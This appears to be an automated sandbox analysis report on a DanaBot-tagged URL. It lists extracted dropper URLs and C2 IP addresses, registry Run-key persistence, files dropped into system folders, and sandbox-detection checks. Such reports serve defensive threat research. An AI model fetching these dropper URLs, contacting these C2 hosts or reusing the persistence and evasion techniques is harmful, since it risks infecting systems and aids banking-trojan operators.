danabot | hxxps://megascratchrewards[.]com/?utm_source=pop&utm_medium=111111[.]111111_111111

Analysis

max time kernel
524s
max time network
650s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25-01-2025 15:30

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://megascratchrewards.com/?utm_source=pop&utm_medium=111111.111111_111111

Score

10^/10

danabot banker discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://blockchainjoblist.com/wp-admin/014080/

exe.dropper

https://womenempowermentpakistan.com/wp-admin/paba5q52/

exe.dropper

https://atnimanvilla.com/wp-content/073735/

exe.dropper

https://yeuquynhnhai.com/upload/41830/

exe.dropper

https://deepikarai.com/js/4bzs6/

Extracted

Language

xlm4.0

Source

URLs

xlm40.dropper

https://erpoweredent.at/3/zte.dll

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Signatures

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot
Danabot family
danabot

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2920	4100	rundll32.exe	201
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1888	3672	powershell.exe	179

Blocklisted process makes network request 8 IoCs

flow	pid	Process
733	1064	rundll32.exe
742	1888	powershell.exe
744	1064	rundll32.exe
750	1064	rundll32.exe
752	1064	rundll32.exe
764	1064	rundll32.exe
765	1064	rundll32.exe
786	1064	rundll32.exe

Executes dropped EXE 1 IoCs

pid	Process
3192	WIN1CC8.pif

Loads dropped DLL 2 IoCs

pid	Process
1688	regsvr32.exe
1064	rundll32.exe

Adds Run key to start application 2 TTPs 10 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WIN1CC8 = "C:\\Windows\\system32\\WIN1CC8.pif"	WIN1CC8.pif
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Q4 = "f:\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WIN1CC8 = "C:\\Windows\\system32\\WIN1CC8.pif"	WIN1CC8.pif
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Q4 = "c:\\eiram\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\quake = "c:\\eiram\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\quake = "f:\\quake4demo.exe"	Quamo.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\help = "C:\\Windows\\help.vbs"	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\rlXNMZVVeqEHbBdgVaDMMQvLlCJmamAvDKUSCosggaeQXopkYgVTCrEuofhDnjRfqvohjqjpdjrgbVDkPahhlbmnHY = "\"C:\\Windows\\rlXNMZVVeqEHbBdgVaDMMQvLlCJmamAvDKUSCosggaeQXopkYgVTCrEuofhDnjRfqvohjqjpdjrgbVDkPahhlbmnHY.exe\""	Yarner.a.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\Desktop\\The-MALWARE-Repo-master\\Email-Worm\\Winevar.exe"	Winevar.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\S:	EXCEL.EXE
File opened (read-only)	\??\V:	EXCEL.EXE
File opened (read-only)	\??\W:	EXCEL.EXE
File opened (read-only)	\??\Y:	EXCEL.EXE
File opened (read-only)	\??\G:	EXCEL.EXE
File opened (read-only)	\??\I:	EXCEL.EXE
File opened (read-only)	\??\N:	EXCEL.EXE
File opened (read-only)	\??\Q:	EXCEL.EXE
File opened (read-only)	\??\M:	EXCEL.EXE
File opened (read-only)	\??\P:	EXCEL.EXE
File opened (read-only)	\??\T:	EXCEL.EXE
File opened (read-only)	\??\U:	EXCEL.EXE
File opened (read-only)	\??\A:	EXCEL.EXE
File opened (read-only)	\??\B:	EXCEL.EXE
File opened (read-only)	\??\E:	EXCEL.EXE
File opened (read-only)	\??\K:	EXCEL.EXE
File opened (read-only)	\??\Z:	EXCEL.EXE
File opened (read-only)	\??\J:	EXCEL.EXE
File opened (read-only)	\??\L:	EXCEL.EXE
File opened (read-only)	\??\H:	EXCEL.EXE
File opened (read-only)	\??\O:	EXCEL.EXE
File opened (read-only)	\??\R:	EXCEL.EXE
File opened (read-only)	\??\X:	EXCEL.EXE

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
649	whatismyipaddress.com
650	whatismyipaddress.com
651	whatismyipaddress.com
655	whatismyipaddress.com
656	whatismyipaddress.com
657	whatismyipaddress.com

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\ZippedFiles.a.exe	ZippedFiles.a.exe
File opened for modification	C:\Windows\SysWOW64\WIN1CC8.pif	Winevar.exe
File opened for modification	C:\Windows\SysWOW64\WIN1CF7.tmp	WIN1CC8.pif
File opened for modification	C:\Windows\SysWOW64\WIN3293.tmp	WIN1CC8.pif
File opened for modification	C:\Windows\SysWOW64\WIN33AD.tmp	WIN1CC8.pif
File created	C:\WINDOWS\SysWOW64\MSDRM\MSOIRMPROTECTOR.DOC	ZippedFiles.a.exe
File created	C:\WINDOWS\SysWOW64\MSDRM\MSOIRMPROTECTOR.PPT	ZippedFiles.a.exe
File created	C:\WINDOWS\SysWOW64\MSDRM\MSOIRMPROTECTOR.XLS	ZippedFiles.a.exe
File created	C:\WINDOWS\SysWOW64\RASCTRNM.H	ZippedFiles.a.exe
File created	C:\Windows\SysWOW64\WIN1CC8.pif	Winevar.exe
File created	C:\Windows\System32\Kernel.vbs	WScript.exe
File opened for modification	C:\Windows\System32\Kernel.vbs	WScript.exe

Probable phishing domain 1 TTPs 2 IoCs

Phishing

T1566

description	flow	ioc	stream
HTTP URL	361	https://romsfun.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=907950ae7eeda016	57
HTTP URL	554	https://www.romhacking.net/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=90795224ea59cacd	5

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\idlj.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\jjs.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\MCABOUT.HTM	WScript.exe
File created	C:\Program Files\Windows Media Player\wmplayer.exe	WScript.exe
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Source Engine\OSE.EXE	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\rmid.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\policytool.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\OSPPREARM.EXE	WScript.exe
File created	C:\Program Files\Windows Media Player\setup_wm.exe	WScript.exe
File created	C:\Program Files\Windows Media Player\wmpshare.exe	WScript.exe
File opened for modification	C:\PROGRAM FILES\JAVA\JDK-1.8\INCLUDE\WIN32\JNI_MD.H	ZippedFiles.a.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\kinit.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\javacpl.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\accicons.exe	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.18.0_x64__8wekyb3d8bbwe\StoreExperienceHost.exe	WScript.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxCalendarAppImm.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\ktab.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\servertool.exe	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\codecpacks.webp.exe	WScript.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe	WScript.exe
File opened for modification	C:\Program Files\Crashpad\metadata	setup.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\pack200.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\unpack200.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\dbcicons.exe	WScript.exe
File opened for modification	C:\Program Files\7-Zip\7z.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe	WScript.exe
File created	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxTsr.exe	WScript.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	WScript.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe	WScript.exe
File created	C:\Program Files\Windows Photo Viewer\ImagingDevices.exe	WScript.exe
File created	C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jconsole.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\pj11icon.exe	WScript.exe
File created	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteim.exe	WScript.exe
File opened for modification	C:\PROGRAM FILES\JAVA\JDK-1.8\INCLUDE\JVMTICMLR.H	ZippedFiles.a.exe
File opened for modification	C:\PROGRAM FILES\MICROSOFT OFFICE\ROOT\OFFICE16\1033\PROTTPLV.XLS	ZippedFiles.a.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-1000-0000000FF1CE}\msouc.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe	WScript.exe
File opened for modification	C:\PROGRAM FILES\JAVA\JDK-1.8\INCLUDE\JVMTI.H	ZippedFiles.a.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\keytool.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jre-1.8\bin\rmiregistry.exe	WScript.exe
File opened for modification	C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	WScript.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	WScript.exe
File opened for modification	C:\PROGRAM FILES\MICROSOFT OFFICE\ROOT\OFFICE16\1033\PROTTPLV.PPT	ZippedFiles.a.exe
File opened for modification	C:\Program Files\CopyMeasure.exe	WScript.exe
File created	C:\Program Files\Internet Explorer\iexplore.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javadoc.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\jdeps.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\keytool.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\extcheck.exe	WScript.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	WScript.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\WINDOWS\INF\.NET MEMORY CACHE 4.0\NETMEMORYCACHE.H	ZippedFiles.a.exe
File created	C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\ASPNET_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\WOW64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.1_NONE_CE10E80FC93AFE5C\MSOIRMPROTECTOR.DOC	ZippedFiles.a.exe
File created	C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\ASPNET_STATE_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-T..LOCALSESSIONMANAGER_31BF3856AD364E35_10.0.19041.1266_NONE_1A0AA046BFBC05B6\LAGCOUNTERDEF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-T..RVICES-PERFCOUNTERS_31BF3856AD364E35_10.0.19041.1266_NONE_BF97C5D5F86E2A8C\TSLABELS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-TRANSACTIONBRIDGEPERFCOUNTERS_B03F5F7F11D50A3A_4.0.15805.0_NONE_6B0477B0FB9004FA\_TRANSACTIONBRIDGEPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-_NETWORKINGPERFCOUNTERS_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_5D7FB023EC33EF8B\_NETWORKINGPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WINDOWSSEARCHENGINE_31BF3856AD364E35_7.0.19041.1151_NONE_EC390BD802A1C630\GSRVCTR.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\WOW64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.746_NONE_F619255888ACBCA6\MSOIRMPROTECTOR.XLS	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\UGTHRSVC\GTHRCTR.H	ZippedFiles.a.exe
File opened for modification	C:\WINDOWS\INF\WMIAPRPL\WMIAPRPL.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\X86_NETFX4-ASPNET_STATE_PERF_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_0C5E324537CBCE25\ASPNET_STATE_PERF.H	ZippedFiles.a.exe
File created	C:\Windows\kerneI32.daa	Yarner.a.exe
File created	C:\WINDOWS\INF\REMOTEACCESS\RASCTRNM.H	ZippedFiles.a.exe
File opened for modification	C:\WINDOWS\INF\SERVICEMODELENDPOINT 3.0.0.0\_SERVICEMODELENDPOINTPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\SMSVCHOST 4.0.0.0\_SMSVCHOSTPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-IIS-ASPBINARIES_31BF3856AD364E35_10.0.19041.906_NONE_6AA8DC8FC623977C\AXCTRNM.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\.NET CLR NETWORKING 4.0.0.0\_NETWORKINGPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\LSM\LAGCOUNTERDEF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\MSDTC\MSDTCPRF.H	ZippedFiles.a.exe
File opened for modification	C:\WINDOWS\INF\SMSVCHOST 3.0.0.0\_SMSVCHOSTPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\WSEARCHIDXPI\IDXCNTRS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-RASBASE_31BF3856AD364E35_10.0.19041.746_NONE_EBD9B2ADD93E89DE\RASCTRNM.H	ZippedFiles.a.exe
File created	C:\Windows\notepad.exe	Yarner.a.exe
File created	C:\Windows\rlXNMZVVeqEHbBdgVaDMMQvLlCJmamAvDKUSCosggaeQXopkYgVTCrEuofhDnjRfqvohjqjpdjrgbVDkPahhlbmnHY.exe	Yarner.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-IIS-W3SVC_31BF3856AD364E35_10.0.19041.1_NONE_74075B27A8B0FC6F\W3CTRS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WCF-M_SMSVCHOST_PERF_C_H_31BF3856AD364E35_10.0.19041.1_NONE_F94FFC5DF8D28AFA\_SMSVCHOSTPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\.NETFRAMEWORK\CORPERFMONSYMBOLS.H	ZippedFiles.a.exe
File opened for modification	C:\WINDOWS\INF\MSDTC BRIDGE 3.0.0.0\_TRANSACTIONBRIDGEPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-ASPNET_STATE_PERF_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_C4B0FB6E234FA51F\ASPNET_STATE_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\WOW64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.1_NONE_CE10E80FC93AFE5C\MSOIRMPROTECTOR.PPT	ZippedFiles.a.exe
File created	C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\ASPNET_STATE_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-ASPNET_PERF_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_98847D95DC4D0E17\ASPNET_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-SYSTEM_CACHING_DLL_PERF_B03F5F7F11D50A3A_4.0.15805.0_NONE_0ECA719E19286B2F\NETMEMORYCACHE.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-_DATAPERFCOU.._SHARED12_NEUTRAL_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_24ED4511DCC3019E\_DATAPERFCOUNTERS_SHARED12_NEUTRAL.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\X86_NETFX-ASPNET_STATE_PERF_H_B03F5F7F11D50A3A_10.0.19041.1_NONE_A71B18B9B7240FD3\ASPNET_STATE_PERF.H	ZippedFiles.a.exe
File created	C:\Windows\help.vbs	WScript.exe
File created	C:\WINDOWS\INF\BITS\BITSCTR.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\WINDOWS WORKFLOW FOUNDATION 4.0.0.0\PERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\Windows\system\host.tmp	Xanax.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-IIS-METABASE_31BF3856AD364E35_10.0.19041.1_NONE_EF230558C150A821\INFOCTRS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.746_NONE_EBC47B06544BFAAB\MSOIRMPROTECTOR.PPT	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-WFPERFCOUNTERS_B03F5F7F11D50A3A_4.0.15805.0_NONE_AC0E521E71A3A45A\PERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WCF-M_SVC_MOD_SVC_PERF_H_31BF3856AD364E35_10.0.19041.1_NONE_51277F142F1F9414\_SERVICEMODELSERVICEPERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX-ASPNET_PERF_H_B03F5F7F11D50A3A_10.0.19041.1_NONE_3516720A3EE7C1FF\ASPNET_PERF.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\USBHUB\USBPERFSYM.H	ZippedFiles.a.exe
File opened for modification	C:\WINDOWS\INF\WINDOWS WORKFLOW FOUNDATION 3.0.0.0\PERFCOUNTERS.H	ZippedFiles.a.exe
File created	C:\Windows\notedpad.exe	Yarner.a.exe
File created	C:\Windows\system\xanax.exe	Xanax.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-T..RVICES-PERFCOUNTERS_31BF3856AD364E35_10.0.19041.1_NONE_00C2FFD3E29A5ADE\TSLABELS.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WINDOWSSEARCHENGINE_31BF3856AD364E35_7.0.19041.264_NONE_8BD2F5FC0C992E06\GSRVCTR.H	ZippedFiles.a.exe
File created	C:\Windows\yawsetup.exe	Yarner.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_NETFX4-_DATAORACLEC.._SHARED12_NEUTRAL_H_B03F5F7F11D50A3A_4.0.15805.0_NONE_3B8D4DACC2EA6B71\_DATAORACLECLIENTPERFCOUNTERS_SHARED12_NEUTRAL.H	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\WOW64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.746_NONE_F619255888ACBCA6\MSOIRMPROTECTOR.PPT	ZippedFiles.a.exe
File created	C:\Windows\bfsvc.exe	Xanax.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-R..T-OFFICE-PROTECTORS_31BF3856AD364E35_10.0.19041.1_NONE_C3BC3DBD94DA3C61\MSOIRMPROTECTOR.XLS	ZippedFiles.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WINDOWSSEARCHENGINE_31BF3856AD364E35_7.0.19041.264_NONE_8BD2F5FC0C992E06\GTHRCTR.H	ZippedFiles.a.exe
File created	C:\WINDOWS\INF\.NET CLR NETWORKING\_NETWORKINGPERFCOUNTERS_V2.H	ZippedFiles.a.exe
File created	C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\ASPNET_PERF.H	ZippedFiles.a.exe
File opened for modification	C:\Windows\rlXNMZVVeqEHbBdgVaDMMQvLlCJmamAvDKUSCosggaeQXopkYgVTCrEuofhDnjRfqvohjqjpdjrgbVDkPahhlbmnHY.exe	Yarner.a.exe
File created	C:\WINDOWS\WINSXS\AMD64_WINDOWSSEARCHENGINE_31BF3856AD364E35_7.0.19041.264_NONE_8BD2F5FC0C992E06\IDXCNTRS.H	ZippedFiles.a.exe
File opened for modification	C:\Windows\Win.ini	WScript.exe
File created	C:\WINDOWS\WINSXS\AMD64_MICROSOFT-WINDOWS-IIS-ASPBINARIES_31BF3856AD364E35_10.0.19041.1_NONE_42755BCB06D24EA8\AXCTRNM.H	ZippedFiles.a.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2716	4200	WerFault.exe	210
4952	3928	WerFault.exe	231
3760	3192	WerFault.exe	240

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yarner.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Xanax.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Winevar.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trood.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZippedFiles.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	White.a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WIN1CC8.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Quamo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DanaBot.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	chrome.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	chrome.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
